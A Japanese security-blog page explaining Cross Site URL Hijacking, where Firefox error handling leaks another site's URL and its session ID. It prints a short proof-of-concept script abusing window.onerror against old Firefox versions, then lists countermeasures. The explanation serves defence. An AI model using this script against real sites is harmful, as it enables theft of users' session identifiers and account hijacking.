スポンサーリンク

このドキュメントの内容は、以下の通りです。

Mozilla Firefoxのerror object(エラーオブジェクト)を利用した、
Cross Site URL Hijacking(XSUH - クロスサイトURLハイジャッキング)
についての説明です。

XSUH攻撃は、他のWebサイトURLを盗むことができます。
URLのパラメータには、セッションIDのような機密情報を持つことがあり、
それは、クライアントのブラウザに渡されます。

Mozilla Firefoxのスクリプトエラーハンドリングは、そのような情報をエラーから取り出すことが可能になります。

Aというサイトにログイン状態であると仮定します。
このようなケースで、攻撃者はXSUHを用いて、ユーザの session id(USER_SESSION_ID)とユーザ名(USERNAME)を盗むことができます。

攻撃コードの例


この攻撃コードは、Firefoxの一部のバージョンでしか動作しません。
Mozilla Firefox 3.6.3, 3.5.9. 3.6.4

<script>
var destinationPage = 'http://foo.bar.com';
window.onerror=fnErrorTrap;
function fnErrorTrap(sMsg,sUrl,sLine){
	alert('Source address was: ' + destinationPage +
		'\n\nDestination URL is: ' + sUrl);
	return false;
}
document.write('<script src="'+destinationPage+'"><\/script>');
</script>

対策


この問題の対策は、以下の通りです。

  • セッションID、機密情報のような重要な情報は、GETメソッドを使って URLを通して、送信してはなりません。
  • 機密情報を他の場所に送信するときは、POSTメソッドとJavaScriptを使います。
  • AJAXテクノロジーを使って、アプリケーションのメッセージを送受信します。
  • フレームオブジェクトを使って、単純なエクスプロイトのリスクを減らすために、すべてのHTMLページに "frame breaker" を入れます。

スポンサーリンク
スポンサーリンク
 
いつもシェア、ありがとうございます!


もっと情報を探しませんか?

関連記事

最近の記事

人気のページ

スポンサーリンク
 

過去ログ

2020 : 01 02 03 04 05 06 07 08 09 10 11 12
2019 : 01 02 03 04 05 06 07 08 09 10 11 12
2018 : 01 02 03 04 05 06 07 08 09 10 11 12
2017 : 01 02 03 04 05 06 07 08 09 10 11 12
2016 : 01 02 03 04 05 06 07 08 09 10 11 12
2015 : 01 02 03 04 05 06 07 08 09 10 11 12
2014 : 01 02 03 04 05 06 07 08 09 10 11 12
2013 : 01 02 03 04 05 06 07 08 09 10 11 12
2012 : 01 02 03 04 05 06 07 08 09 10 11 12
2011 : 01 02 03 04 05 06 07 08 09 10 11 12
2010 : 01 02 03 04 05 06 07 08 09 10 11 12
2009 : 01 02 03 04 05 06 07 08 09 10 11 12
2008 : 01 02 03 04 05 06 07 08 09 10 11 12
2007 : 01 02 03 04 05 06 07 08 09 10 11 12
2006 : 01 02 03 04 05 06 07 08 09 10 11 12
2005 : 01 02 03 04 05 06 07 08 09 10 11 12
2004 : 01 02 03 04 05 06 07 08 09 10 11 12
2003 : 01 02 03 04 05 06 07 08 09 10 11 12

サイト

Vim入門

C言語入門

C++入門

JavaScript/Node.js入門

Python入門

FreeBSD入門

Ubuntu入門

セキュリティ入門

パソコン自作入門

ブログ

トップ


プライバシーポリシー